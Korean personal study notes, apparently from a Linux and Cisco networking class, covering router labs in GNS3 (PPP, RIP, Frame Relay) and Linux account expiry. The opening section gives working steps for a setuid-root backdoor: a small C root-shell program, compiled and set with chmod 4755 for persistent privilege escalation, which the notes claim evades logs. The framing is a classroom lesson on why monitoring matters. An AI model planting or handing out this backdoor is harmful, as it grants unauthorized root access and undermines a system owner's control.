'우연히' 내 파트너 root계정에 로그인 되었다 or 비번을 알게되었다. 내 유저 계정 user1 cd /home/user1에 들어가서 backdoor.c 파일 심어서 나중에 ssh 192.168.10.32해서 user1로 로그인 한다음에(비번안다는 가정)
거기서 backdoor.c 파일이 있는 디렉토리 cd /home/user1 들어가서 ./backdoor.c 하면 아무리 파트너가
root 관리자 계정을 어렵게 바꿔도 나는 root 관리자권한 탈취 가능
이건 로그기록도 안뜸
진짜 위험한거임
그래서 24시간 모니터링해서 이런파일이 생성되지않게 봐야함
dnf install -y gcc
cd /home/user1
vim backdoor.c
빔 파일내용은 ▼
#include <stdio.h>
main(){
setuid(0);
setgid(0);
system("/bin/bash");
}
이후 ls -a해서 backdoor.c 잘 만들어진거 확인하고
gcc -o backdoor backdoor.c
chmod 4755 backdoor 해놓고 logout
이후 다시 ssh 192.168.10.32해서 user로 로그인한다음(비번안다는가정)
cd /home/user1 이동 후
./backdoor 하면 관리자 권한 탈취 완료
이 코드는 Linux/Unix 시스템에서 권한 승격을 수행하는 간단한 C 프로그램입니다. 자세히 설명하겠습니다:
코드 분석
1. setuid(0)
- 설명:
- setuid 함수는 프로세스의 사용자 ID(User ID)를 변경합니다.
- 0은 시스템의 **루트 사용자 ID(root, superuser)**를 의미합니다.
- 목적:
- 현재 실행 중인 프로세스를 루트 사용자 권한으로 변경.
2. setgid(0)
- 설명:
- setgid 함수는 프로세스의 그룹 ID(Group ID)를 변경합니다.
- 0은 루트 그룹 ID를 의미합니다.
- 목적:
- 현재 프로세스를 루트 그룹 권한으로 설정.
3. system("/bin/bash")
- 설명:
- system 함수는 지정된 명령어(여기서는 /bin/bash)를 새로운 프로세스로 실행합니다.
- /bin/bash는 쉘(bash)을 실행하는 명령어입니다.
- 목적:
- 루트 권한으로 새 bash 쉘을 실행.
- 실행 결과, 루트 권한을 가진 명령어 실행 환경이 제공됩니다.
4. main()
- 설명:
- 간단히 루트 권한의 쉘을 실행하기 위해 구성된 프로그램의 진입점.
동작 방식
- 실행된 프로그램은 기본적으로 현재 사용자와 그룹의 ID로 실행됩니다.
- **setuid(0)**와 **setgid(0)**를 호출하여 프로세스의 사용자 ID와 그룹 ID를 루트로 변경.
- 루트 권한을 가진 상태에서 bash 쉘을 실행.
- 사용자는 루트 권한으로 명령어를 실행할 수 있는 환경에 접근.
실행 조건
- 루트 권한 필요:
- 프로그램이 정상적으로 실행되려면 루트 권한으로 실행되어야 합니다.
- 그렇지 않으면 **setuid**와 setgid 호출이 실패합니다.
- SUID 비트 설정 가능:
- 실행 파일에 SUID 비트를 설정하면 일반 사용자도 이 프로그램을 실행 시 루트 권한을 가질 수 있습니다.
- SUID 설정 방법:
chmod u+s <program_name> - 주의: SUID 비트를 설정하면 보안 문제가 발생할 수 있습니다.
사용 사례
- 시스템 관리자가 루트 권한으로 특정 작업을 수행하도록 설계된 프로그램.
- 교육 및 테스트 목적으로 권한 승격의 동작을 이해하기 위한 실험.
보안 문제
이 코드는 심각한 보안 위험을 유발할 수 있습니다:
- 루트 권한 남용:
- 일반 사용자가 프로그램을 실행하면 루트 권한으로 시스템 명령을 실행할 수 있습니다.
- 시스템 보안이 침해될 수 있음.
- SUID 비트 악용:
- 프로그램 파일에 SUID 비트가 설정되면 악성 사용자가 이를 악용하여 시스템을 손상할 수 있습니다.
- 제한 없는 루트 쉘 제공:
- 프로그램이 실행되면 제한 없이 루트 쉘을 사용할 수 있어, 공격자가 시스템을 완전히 제어할 가능성이 있습니다.
결론
이 프로그램은 루트 권한으로 bash 쉘을 실행하는 간단한 프로그램입니다.
- 학습 목적으로는 유용하지만, 실제 환경에서는 심각한 보안 문제가 될 수 있습니다.
- 루트 권한 프로그램은 항상 신중히 설계하고, 반드시 필요한 작업에 대해서만 권한 승격을 수행해야 합니다.
만약 내가 우연히 관리자 번호를 알았어.
그래서 ssh로 옆친구 루트 계정으로 들어갔어
그래서 거기서 이제 해킹을 시작할꺼야
이후 cd /home/user1 들어가기
id 하면 root로 뜰거임
whoami하면 내가 누군지 뜸 ㅎㅎroot! 귀엽다(여기 서버에서 루트라는거임)
who am i라고 하면? root pts/1 2024-120- 11:00(192.168.10.31)으로 뜸(진짜나임)_
pwm
vim backdoor.c하고 i누르고 쓰기
해킹코드 쓸거임
shift 콜론 누르고 wr하고 나오기
ls -a 하면 빨갛게 나오고 튀어
하고 user로 로그인하고 ./backdoor치면 난 관리자가되는거임
이건 로그파일에 안잡힘 ㄷㄷ
dnf install -y gcc
cd /home/user0
vim gedit backdoor.c
gcc -o backdoor backdoor.c
chmod 4755 backdoor
이후 ssh 192.168.10.32 user1로 로그인 후
거기서 ls -a 해서 backdoor파일 확인후
./backdoor하면 관리자권한 탈취 가능
로그에도 안잡힘
이제 친구가 아무리 root자기 계정 비번 바꿔도
난 유저로 거기 들어가서 ./backdoor하면 관리자 권한 언제든지먹을수있음
그래서 이건 '우연히' 관리자계정을 얻어야하는거임
참고로
현실에서는 이거 만들면 바로 걸리고, ROOT패스워드 절대 못뚫음 ㅋㅋ
만약 뚫였다? 아 역시 사람이 문제다~오후는 네트워크 수업!~~
gns3 실습 라우터 암호화 작업할꺼임
라우터 암호에 6개 걸 수 있다해쬬?
1. 라우터 관리자 암호 2개
2. 모뎀 암호
3. 콘솔 암호
4. 원격 암호
5. 모든 설정된 암호화 이후로 설정되는 패스워드의 암호화 작업
명령어를 놓고보면
R1
conf t
enable password cisco
end
copy run start
show running-config
이렇게 하면 sh running-config하면
enable password cisco라고 보임
conft
service password-encryption
하면 5번임
sh running-config하면 이제 안보임
enable password 7 094F471A1A0A
만든 모든것들이 다 암호화됨
설정된 모든 암호와 앞으로 설정할 모든 암호들이 자동으로 암호화된다
no service password-encryption하면 다 암호화 풀림이 아님.ㄷㄷ
암호화된건 그대로 남겨져있넹
현장에서는 무조건 해야함 근데 우리는 실습해야해서 안해야함. 복호화 절대 못함 ㅋ
secondary ip 설정
conf t
hostname SEOUL
이름 바꾸기
라우터랑 스위치랑 다른점
스위치는 장비들이 연결되면 즉시 사용가능하도록 모든 포트들이 활성화되어있다.
그래서 선만 바로 가따꽂으면 바로 연결 굳/ 내부에서 쓰니까 맨날 활성화~~
라우터는 인터넷과 연결되는 장비이므로, 해킹 방지를 위하여 모든 포트들이 비활성화되어있음
int e0/0
ip add 192.168.10.4
no sh
show ip interface brief
내꺼 포트가 다 보여용~~ unassigned-->할당 안됐다는거임
SEOUL# sh ip int br
Interface IP-Address OK? Method Status Protocol
Ethernet0/0 unassigned YES NVRAM administratively down down
Ethernet0/1 unassigned YES NVRAM administratively down down
Ethernet0/2 unassigned YES NVRAM administratively down down
Ethernet0/3 unassigned YES NVRAM administratively down down
Ethernet1/0 unassigned YES NVRAM administratively down down
Ethernet1/1 unassigned YES NVRAM administratively down down
Ethernet1/2 unassigned YES NVRAM administratively down down
Ethernet1/3 unassigned YES NVRAM administratively down down
Serial2/0 172.16.12.1 YES NVRAM up up
Serial2/1 unassigned YES NVRAM administratively down down
Serial2/2 unassigned YES NVRAM administratively down down
지금 나와있는 유선들 종류
Etnernet 1-10Mbps 약 10만개
FastEthernet(광랜) 10-100Mbps
GigabitEthernet 100-1000Mbps
10GigabitEthernet 1000-10000Mbps
예를 들어 10GigabitEthernet 1000-10000Mbps 이건 다운보다 스트리밍이 더 빠름 ㅋㅋ
에서 1기가 영화 다운받는다하면, 1초 걸림~ 캬~ 근데 ethernet은 3일거림..ㅎㅎ
700mb영화다운받는데 일주일씩 걸림..옛날에는...ㄷㄷfastEthernet은 1기가 영화 보통 5분정도걸림
근데 못하죠? 왜죠? 실제 속도는 낮은 속도니까..
기가비타는 비싸여~
그래서 보통은 fastethernet쓰져
아이러니한건, 우리가 인터넷 광국인데 옛날말, 필리핀 대도시가 더 빠름 ㅎㅎ 맞음 이미 초월된지 오래임 ;
미국은 대도시만 빠르지, 퇴근하구 집가면, 모뎀으로 하는거지, 쓰는만큼 돈 내고 함
미국 시골집들은 그렇게 인터넷하면 느리니까 위성으로 하는거지;캬 천조국 클라스;;
내 랜카드는 ethernet이야. 우리집은 gigabitethernet신청했어-->응 속도 안나;
컴터 랜카드도 속도 보고 사야함. 그리고 그 랜카드에 맞는 서비스를 신청해야함
그래서 as기사들이 집가면, pc랜카드가 느린데..속도 안나온다고 난리치면 이제 설명해주는거지ㅠㅠ
고통..
C:\Windows\system32>ipconfig/all
Windows IP 구성
호스트 이름 . . . . . . . . : Eclass-01
주 DNS 접미사 . . . . . . . :
노드 유형 . . . . . . . . . : 혼성
IP 라우팅 사용. . . . . . . : 아니요
WINS 프록시 사용. . . . . . : 아니요
이더넷 어댑터 이더넷:
연결별 DNS 접미사. . . . :
설명. . . . . . . . . . . . : Realtek Gaming 2.5GbE Family Controller (대만 realtek 회사 게이밍용이기고 2.5기가비트~랜카드~
물리적 주소 . . . . . . . . : D8-BB-C1-57-1E-A2
DHCP 사용 . . . . . . . . . : 아니요
자동 구성 사용. . . . . . . : 예
IPv4 주소 . . . . . . . . . : 192.168.10.11(기본 설정)
서브넷 마스크 . . . . . . . : 255.255.255.0
기본 게이트웨이 . . . . . . : 192.168.10.1
DNS 서버. . . . . . . . . . : 8.8.8.8
168.126.63.1
Tcpip를 통한 NetBIOS. . . . : 사용
ip add 172.16.1.0 255.255.255.0
bad mask /24 for address 172.16.1.0 네트워크 주소라서 안됨
네트워크 주소, 브로드캐스트 주소, 게이트웨이 주소는 다 오류납니당~
ip add 172.16.1.254 255.255.255.0
no sh
sh ip int br 하고 확인
SEOUL#sh ip int br
Interface IP-Address OK? Method Status Prot ocol
Ethernet0/0 172.16.1.254 YES manual up up
만약 첫번째꺼가 동작 안하면 secondary ip가 동작하는거임
ip add 172.16.20.1 255.255.255.0 secondary
참고로 third는 없음. why? secondary 붙이면 알아서 작동함
예를 들어 secondary 1
secondary 2 secondary 3 이케 설정해두면, 1 오류->2 오류-> 3..쭉쭉 갑니다
ip add 172.16.20.1 255.255.255.0 secondary
sh run
interface Ethernet0/0
ip address 172.16.20.1 255.255.255.0 secondary
ip address 172.16.1.254 255.255.255.0
WAN protocol check
라우터<---->라우터 연결할려면 wan 프로토콜이 설정되어야한다
wan 프로토콜은 5개
Frame-Relay, ISDN, HDLC, PPP, ATM
frame-relay 우리나라는 안씀, 미국이랑 일본은 씀. 속도가 너무 느려서 안씀. 우린 vpn을 씀~
ISDN도 예전에 쓰던건데, 전화기로 전화만 해요? 문자도 보내고, 메일도 하고, 티비도 보고
맞아요 종합통신망이 isdn이에요~
전화기 원래 목적은 뭐에요? 전화죠~문자랑 소리를 별도로 관리하는거죵
ppp-point to point 1대1로 연결하는거임. 전화번호 대신에 쓰던거
atm ATM은 시간에민감한트래픽문제때문에도입된프로토콜로음성, 영상,
데이터를동시에전송할수있으며이프로토콜은패킷이아닌53Byte 고정 길이의셀을사용한다
default는 HDLC임
wan프로토콜은 같아야함. 다르면 통신 안됨. 양쪽은 맞춰야함
leased lines 인터넷 회사isp에서 한걸 우리가 대여해서 쓰는거임
Circuit Switching 전화기라 생각하면됨. 옛날에는 서울로 전화하고 싶다? 전화국에서 중간에 연결해줘야했었음 지금은 컴터가 알아서해줌
군대가 지금 이방식이라 생각하면됨 통신병
Packet Switching은 요새 인터넷 연결 사용방법
gns3 명령어
shift 누른상태에서 라우터 누르면 갯수 적고 한번에 나옴 올 ㅋㅋ
검정색 실선은 내부 연결이라는 뜻
번개모양 실선은 인터넷으로 연결됐다는 외부 연결이라는 뜻
라우터에 연결된 선이 3개? 네트워크 세개~
3개의 아이피 대역이 나와야함
선하나당 아이피 대역이 다른거임
R3랑 R4 하나씩 따서 34
R4랑 R5 하나씩 따서 45
1. Frame-Relay
- 약어: Frame-Relay (약어 자체는 없습니다)
- 설명:
- 패킷 스위칭 기술로, 고속 데이터 통신을 위해 설계되었습니다.
- 데이터 링크 계층(Layer 2) 프로토콜로 동작하며, 비용 효율적이고 간단한 구조로 여러 네트워크 간의 연결을 지원합니다.
- 주로 기업의 광역 네트워크(WAN)에서 사용되었습니다.
- 특징:
- 고정된 크기의 프레임.
- 신뢰성이 높은 네트워크에서 오류 검출 및 복구는 상위 계층에서 처리.
2. ISDN
- 약어: Integrated Services Digital Network
- 설명:
- 음성, 데이터, 영상 등 다양한 서비스를 통합적으로 제공하기 위한 디지털 전화 네트워크 시스템.
- 전화선을 통해 디지털 데이터를 전송하며, 과거 전화 네트워크의 아날로그 데이터 전송 한계를 극복하기 위해 설계.
- 구성:
- BRI (Basic Rate Interface):
- 두 개의 64kbps 채널(B 채널)과 하나의 16kbps 채널(D 채널).
- PRI (Primary Rate Interface):
- 여러 B 채널과 하나의 D 채널로 구성(일반적으로 23B + 1D).
- BRI (Basic Rate Interface):
- 특징:
- 빠른 데이터 전송 속도.
- 전화와 데이터 전송을 동시에 지원.
3. HDLC
- 약어: High-Level Data Link Control
- 설명:
- 데이터 링크 계층에서 사용되는 비트 지향 프로토콜로, 데이터 전송의 신뢰성을 보장.
- IBM에서 설계한 SDLC(Synchronous Data Link Control)를 기반으로 ITU에서 표준화.
- 주로 점대점(Point-to-Point) 또는 멀티포인트 네트워크에서 사용.
- 특징:
- 비트 지향 프로토콜(각 데이터 필드가 비트 단위로 처리됨).
- 데이터 프레임 내에 주소, 제어, 데이터, 오류 검출 코드 포함.
- 장점:
- 오류 검출 및 흐름 제어 기능 제공.
- 단점:
- 유연성이 부족하며, 새로운 기능 추가가 어려움.
4. PPP
- 약어: Point-to-Point Protocol
- 설명:
- 네트워크 계층 프로토콜(IP 등)을 데이터 링크 계층을 통해 전송하기 위한 점대점(Point-to-Point) 통신 프로토콜.
- 주로 전화선, ISDN, 직렬 연결에서 사용되며, HDLC를 기반으로 설계됨.
- 특징:
- 다양한 프로토콜 지원: IP, IPv6, IPX 등.
- 확장성: 인증(예: PAP, CHAP), 압축, 암호화 기능 지원.
- 유연성: 다중 링크(Multi-Link PPP) 및 네트워크 계층 주소 협상.
- 장점:
- HDLC보다 유연하고 다양한 네트워크 환경에서 사용 가능.
5. ATM
- 약어: Asynchronous Transfer Mode
- 설명:
- 고속 광대역 네트워크를 위한 셀(cell) 스위칭 기술.
- 고정된 크기의 데이터 단위(53바이트 셀)를 사용하여 데이터, 음성, 비디오 등 다양한 트래픽을 처리.
- 특징:
- 고정 크기 셀(53바이트) 사용: 48바이트 페이로드 + 5바이트 헤더.
- QoS(Quality of Service) 지원: 트래픽 유형에 따라 서비스 품질 보장.
- 고속 전송: 대규모 데이터 전송에 최적화.
- 주요 사용처:
- 기업 네트워크, 통신 사업자의 백본(backbone) 네트워크.
- 단점:
- 복잡성과 비용이 높아 현재는 대부분 다른 기술로 대체.
요약
프로토콜 약어 설명
| Frame-Relay | 없음 | WAN 환경에서 사용되는 패킷 스위칭 기술. |
| ISDN | Integrated Services Digital Network | 음성, 데이터, 영상 등을 통합적으로 제공하는 디지털 네트워크 시스템. |
| HDLC | High-Level Data Link Control | 비트 지향 데이터 링크 프로토콜로, 신뢰성과 오류 검출 기능 제공. |
| PPP | Point-to-Point Protocol | IP와 같은 네트워크 계층 프로토콜을 데이터 링크 계층에서 전송. |
| ATM | Asynchronous Transfer Mode | 고정된 크기의 셀을 사용하여 데이터, 음성, 비디오 트래픽을 고속으로 처리하는 셀 스위칭 기술. |
사용 사례
- Frame-Relay: 기업 WAN 연결.
- ISDN: 과거 음성 및 데이터 통합 네트워크.
- HDLC: 점대점 직렬 연결.
- PPP: 전화선 기반 네트워크 연결.
- ATM: 고속 백본 네트워크.
라우터 ip 설정 게이트웨이 설정
[R1]
conf t
int e0/0
ip add 172.16.1.254 255.255.255.0
no sh
int s2/0
ip add 172.16.12.1 255.255.255.0
no sh
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy run start
[R2]
conf t
int e0/0
ip add 172.16.2.254 255.255.255.0
no sh
int s2/0
ip add 172.16.12.2 255.255.255.0
no sh
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy run start
이 명령어 세트는 Cisco 라우터에서 **RIP (Routing Information Protocol)**를 설정하고 구성한 내용을 저장하는 과정을 보여줍니다. 하나씩 설명하겠습니다.
1. router rip
- 설명:
- RIP (Routing Information Protocol) 설정 모드로 진입.
- RIP는 거리 벡터(distance vector) 라우팅 프로토콜로, 네트워크의 라우팅 정보를 학습하고 전파하는 데 사용됩니다.
- 결과:
- 라우터에서 RIP를 활성화.
2. network 172.16.0.0
- 설명:
- RIP 프로토콜이 작동할 네트워크를 지정.
- 172.16.0.0 네트워크에 연결된 인터페이스를 RIP에 포함시키고, 이 네트워크의 라우팅 정보를 학습 및 광고.
- 결과:
- 라우터는 172.16.0.0/16 네트워크와 관련된 라우팅 정보를 다른 RIP 라우터에 전송.
- 라우터는 이 네트워크의 다른 RIP 라우터로부터도 라우팅 정보를 수신.
3. version 2
- 설명:
- RIP의 버전을 2로 설정.
- RIP에는 두 가지 버전이 있음:
- RIP version 1 (RIPv1):
- 클래스풀(classful) 라우팅 프로토콜로, 서브넷 정보 없이 네트워크 정보를 전송.
- RIP version 2 (RIPv2):
- 클래스리스(classless) 라우팅 프로토콜로, 서브넷 정보와 인증 기능을 지원.
- RIP version 1 (RIPv1):
- 결과:
- 라우터는 RIPv2를 사용하여 라우팅 정보를 교환.
4. no auto-summary
- 설명:
- 자동 요약(Auto-Summarization) 기능을 비활성화.
- RIP은 기본적으로 클래스풀 네트워크 경계를 기준으로 라우트를 요약합니다.
- 예: 172.16.0.0/16 네트워크의 서브넷들이 자동으로 172.16.0.0으로 요약되어 광고.
- 이 명령은 서브넷 정보를 정확히 광고하도록 설정.
- 결과:
- 라우터가 정확한 서브넷 정보를 전송하고 수신하도록 설정.
5. end
- 설명:
- RIP 설정 모드를 종료하고 기본 명령 모드로 돌아갑니다.
6. copy run start
- 설명:
- 라우터의 현재 실행 중인 설정(Running Configuration)을 NVRAM의 시작 설정 파일(Startup Configuration)에 저장.
- 라우터 재부팅 후에도 구성 설정이 유지됨.
- 명령어 분해:
- copy: 파일을 복사하는 명령어.
- run: 실행 중인 설정 파일.
- start: 시작 설정 파일.
- 결과:
- 설정을 영구적으로 저장.
전체 동작 요약
- RIP 프로토콜을 활성화.
- RIP 프로토콜이 관리할 네트워크(172.16.0.0)를 지정.
- RIP 버전을 2로 설정하여 클래스리스 라우팅 및 인증 지원.
- 자동 요약을 비활성화하여 서브넷 정보를 정확히 광고.
- 설정 종료 후 저장.
명령어 결과
이 구성은 RIP Version 2를 사용하여 172.16.0.0/16 네트워크에 대해 서브넷 수준의 라우팅 정보를 교환하며, 재부팅 후에도 설정이 유지됩니다.
[실습] R3라우터 추가 이후 encapsulation
wan protocol ppp랑 hdlc로 변경후 연결되는지 확인해보기
시리얼을 연결할땐 전원끄고 설정해야함
키고하면 랜카드 나가여~
선을 다 연결해놓고 전원을 켜야한다는얘기임!
시리얼 포트는 절대적으로 연결 끄고해야함
아니면 랜카드 빠이에여~
이더넷은 상관 xx
sh int s2/0
R1#sh int s2/0
Serial2/0 is up, line protocol is up
Hardware is M4T
Internet address is 172.16.12.1/24
MTU 1500 bytes, BW 1544 Kbit/sec, DLY 20000 usec,
reliability 255/255, txload 1/255, rxload 1/255
Encapsulation HDLC, crc 16, loopback not set <---------------프로토콜 HDLC라는거임
Keepalive set (10 sec)
Restart-Delay is 0 secs
Last input 00:00:02, output 00:00:03, output hang never
Last clearing of "show interface" counters never
Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0
Queueing strategy: fifo
Output queue: 0/40 (size/max)
5 minute input rate 0 bits/sec, 0 packets/sec
5 minute output rate 0 bits/sec, 0 packets/sec
128 packets input, 9814 bytes, 0 no buffer
Received 105 broadcasts (19 IP multicasts)
0 runts, 0 giants, 0 throttles
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
154 packets output, 12120 bytes, 0 underruns
0 output errors, 0 collisions, 2 interface resets
0 unknown protocol drops
0 output buffer failures, 0 output buffers swapped out
3 carrier transitions DCD=up DSR=up DTR=up RTS=up CTS=up
conf t
int s/20
encapsulation ppp하고
핑 하면 안떨어짐요
Encapsulation PPP, LCP REQsent, crc 16, loopback not set <----여긴 ppp프로토콜이니까
R1 WAN프로토콜이 PPP고
R2 WAN 프로토콜이 HDLC라서 안되는거임
R2(config-if)#encapsulation ppp
R2(config-if)#end
R2#
*Dec 3 06:00:43.753: %SYS-5-CONFIG_I: Configured from console by console
*Dec 3 06:00:43.975: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/0, changed state to up
R1 WAN PROTOCOL PPP 맞추면
R2 WAN PROTOCOL PPP 맞추면 다시 통신됨 굳
참고로
R1----------------R2---------------R3
HDLC PPP
R1 R3 통신됩니다!!
R1입장에서는 인접된 라우터끼리만 프로토콜 맞추면 연결되거든R3가 PPP는 뭐든 상관X
[실습] R1,R2,R3 라우터에 PPP PAP 설정하고 통신 확인
만약 pap 설정한거 비번 보고싶으면 sh running-config해야보임 sh int s2/0해도 안보임
R1
R1#conf t
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#username R2 password cisco
R1(config)#int s2/0
R1(config-if)#ppp au
R1(config-if)#ppp authen
R1(config-if)#ppp authentication pap
R1(config-if)#
*Dec 3 06:47:13.803: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/ changed state to down
R1(config-if)#ppp pap sent-username R1 password cisco
R1(config-if)#
*Dec 3 06:48:20.335: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/ changed state to upR2
R2(config)#username R3 password cisco
R2(config)#int s2/1
R2(config-if)#ppp aut
R2(config-if)#ppp authen
R2(config-if)#ppp authentication pap
R2(config-if)#ppp pap
*Dec 3 06:53:07.063: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/1, changed state to down
R2(config-if)#ppp pap sent-username
R2(config-if)#ppp pap sent-username R2 password cisco
R2(config-if)#exit
R2(config)#username R3 password cisco
R2(config)#int s2/1
R2(config-if)#ppp authen
R2(config-if)#ppp authentication pap
R2(config-if)#ppp pap sent-username R2 password cisco
R2(config-if)#
*Dec 3 06:54:48.881: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/1, changed state to up
R3
R3#conf t
Enter configuration commands, one per line. End with CNTL/Z.
R3(config)#username R2 password cisco
R3(config)#int s2/0
R3(config-if)#ppp authen
R3(config-if)#ppp authentication pap
R3(config-if)#ppp pap sent-username R3 password cisco
R3(config-if)#
*Dec 3 06:54:48.881: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/0, changed state to up
sh running-config
interface Serial2/0
ip address 172.16.12.1 255.255.255.0
encapsulation ppp
ppp authentication pap
ppp pap sent-username R1 password 0 cisco
serial restart-delay 0
야무지게 password cisco 설정된게 보입니다
xshell5 설정하고 다같이 세팅~
gns3에서 세팅방법
xshell5
edit
prefernces
console applications
console settings
xshell5
한다음
xshell5열고 거기서 도구 키입력을 모두 세션으로 클릭하면
r1에서 wr하면 여기 열려있는 세션 전부다 wr 해지는거임 꿀 ㅋ
gns3에서 위에 저거 누르면 챠르르르 창 뜬다
[R1,R2는 PPP PAP로 나두고 R2, R3 PPP PAP 설정한거 지우고 PPP CHAP으로 세팅하기]
R2
sh running-config한다음
int s2/1에서
ppp pap sent-username R3 password 0 cisco
이거 확인하고
conf t
int s2/1들어가서
no ppp pap sent-username R2 password 0 cisco 하면 지워짐
end
다시 sh running-config한 다음 삭제 됐는지 확인한 후
ppp chap 세팅해줄꺼임
conf t
int s2/1
ppp authentication chap
exit
username R3 password cisco
int s2/1
ppp authentication chap
R3
sh running-config한다음
int s2/0에서
ppp pap sent-username R2 password 0 cisco
이거 확인하고
conf t
int s2/0들어가서
no ppp pap sent-username R2 password 0 cisco 하면 지워짐
end
다시 sh running-config한 다음 삭제 됐는지 확인한 후
ppp chap 세팅해줄꺼임
conf t
int s2/0
ppp authentication chap
exit
username R2 password cisco
int s2/0
ppp authentication chap
1203-3_FR LAB 세팅 시작
세팅 중
일단 FRSW랑 라우터 연결하는 포트 빼고는 설정할꺼임.
PC1
ip 172.16.1.1 255.255.255.0 172.16.1.254
PC2
ip 172.16.1.2 255.255.255.0 172.16.1.254
PC3
ip 172.16.2.3 255.255.255.0 172.16.2.254
PC4
ip 172.16.2.4 255.255.255.0 172.16.2.254
PC5
ip 172.16.3.5 255.255.255.0 172.16.3.254
PC6
ip 172.16.3.6 255.255.255.0 172.16.3.254
R1
conf t
int e0/0
ip add 172.16.1.254 255.255.255.0
no sh
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy r start
R2
conf t
int e0/0
ip add 172.16.2.254 255.255.255.0
no sh
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy r start
R3
conf t
int e0/0
ip add 172.16.3.254 255.255.255.0
no sh
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy r start
wan protocol 중 frame-ray 배울꺼임
R1(config)#int s2/0
R1(config-if)#en
R1(config-if)#encapsulation ?
atm-dxi ATM-DXI encapsulation
bstun Block Serial tunneling (BSTUN)
frame-relay Frame Relay networks
hdlc Serial HDLC synchronous
lapb LAPB (X.25 Level 2)
ppp Point-to-Point protocol
sdlc SDLC
sdlc-primary SDLC (primary)
sdlc-secondary SDLC (secondary)
smds Switched Megabit Data Service (SMDS)
stun Serial tunneling (STUN)
x25 X.25
R1(config-if)#encapsulation fr
R1(config-if)#encapsulation frame-relay ?
MFR Multilink Frame Relay bundle interface
ietf Use RFC1490/RFC2427 encapsulation
<cr>
R1(config-if)#encapsulation frame-relay ietf
R1(config-if)#no sh
*Dec 3 08:34:16.704: %LINK-3-UPDOWN: Interface Serial2/0, changed state to up
R1(config-if)#
*Dec 3 08:34:27.713: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/0, changed state to up
ietf는 default라서 굳이 안붙이고 그냥 encapsulation frame-relay만 쳐도 ietf 적용됨
인터페이스를 논리적으로 쪼개는거임(.)이 서브 인터페이스 지원하는거임 p는 point약자
r1이 r2랑 r1이 r3랑 연결한다는거임
이제 우린 42억개 사용가능 ㅋㅋ
int s2/0.12 p
R1(config-if)#int s2/0.12 p
R1(config-subif)# <----서브 인터페이스로 들어간거임
R1(config-subif)#ip add 172.16.12.1 255.255.255.0 <------no sh 안해도됨 why? 논리선이라서
no sh은 물리선 int s2/0만 줘야함
R1(config-if)#int s2/0.12 p
R1(config-subif)#ip add 172.16.12.1 255.255.255.0
R1(config-subif)#FRAM
R1(config-subif)#FRAMe-relay int
R1(config-subif)#FRAMe-relay interface-dlci 102
R1(config-fr-dlci)#
DLCI는 Data Link Connection Identifier의 약자입니다
[Frame-Relay R1]
conf t
int s2/0
no sh
encapsulation frame-relay
int s2/0.12 p
ip add 172.16.12.1 255.255.255.0
frame-relay interface-dlci 102
int s2/0.13 p
ip add 172.16.13.1 255.255.255.0
frame-relay interface-dlci 103
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy run start
[Frame-Relay R2]
conf t
int s2/0
no sh
encapsulation frame-relay
int s2/0.12 p
ip add 172.16.12.2 255.255.255.0
frame-relay interface-dlci 201
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy run start
[Frame-Relay R3]
conf t
int s2/0
no sh
encapsulation frame-relay
int s2/0.13 p
ip add 172.16.13.3 255.255.255.0
frame-relay interface-dlci 301
router rip
network 172.16.0.0
version 2
no auto-summary
end
copy run start
아 안됨ㅋㅋㅋㅋㅋㅋ아!!!!zzzzzzzzzzzz
아 아이피 이슈였다.. 라우터 r3 아이피 이때까지 172.16.13.3넣어야하는데
172.10.13.3 ㅇㅈㄹ하고있었음ㅋㅋㅋ
편안하게 집 갈 수 있게되었다....
pc1에서 pc6로 ping 잘 보내진다...헤헤헤헤헤
오늘 메모한거
오전 9:30 2024-12-03
리눅스 계정 생성
man useradd
useradd --help
하면 명령어 사용법이나 옵션 등등 다 나옴 친절한 리눅스~!~~
useradd -e 옵션은 지정된 날짜까지 계정 사용한다는거임 유통기한
useradd -e 2024/12/31
useradd -e 2024/12/02 korea2
passwd korea2
123456
123456
grep korea2 /etc/passwd /etc/shadow 동시에 열기 ㅋㅋㅋ엌ㅋ
root@R91-01 ~]# grep korea2 /etc/passwd /etc/shadow
/etc/passwd:korea2:x:1018:1018::/home/korea2:/bin/bash
/etc/shadow:korea2:$6$rounds=100000$VPu.yPxmNU8mzcIJ$k7XeABJeJRN2NL1YHaKXHF7VJcSlCURdPjwiVVj69sVUUPLdpsOTtzK9x1FrE020jXhHOBPbTJx.gFVzfzITS.:20060:0:99999:7::20059:
이후 5번터미널에서 로그인하면 expired됐다고 나옴
계정 생성 계정 삭제 계정 수정 (user modify)
useradd userdel -r usermod
그룹생성 그룹삭제 그룹수정
groupadd groupdel groupmod
groupdel은 -r 할 필요없음..계쩡만 그렇뎅..힝
[실습]
korea2 계정은 2024년 12월 2일자로 만료되어 현재 로그온 할 수 없다
그럼 저걸 로그인 할 수 있게할려면? 날짜를 수정해야게쪄?
계정 만료 옵션 -e
cat /etc/shadow(암호화파일관리문서)
생성날짜
user1$~~20054
korea2$~~20060:20059(이건 만료됐다는거)
유닉스 1960 1970년1월1일에 공표됨
리눅스는 월력이 아닌 일력이 지남
20054일이 지났다는거임 ㄷㄷ 365 3650 36500
1970년1월1일부터 20060일지났다는게 오늘 2024년12월3일된거임
1970년1월1일부터 20054일지났다는게 오늘 2024년12월3일된거임
user1$~~20054
korea2$~~20060:20059(이건 만료됐다는거:99999(암호사용기간)
99999(300년)암호를 300년 쓸 수 있다는 얘기라는거임
ㅋㅋㅋ이거 이제 별로없으면 이제 암호가 만료된다는거임
[root@R91-01 ~]# grep korea2 /etc/passwd /etc/shadow
/etc/passwd:korea2:x:1018:1018::/home/korea2:/bin/bash
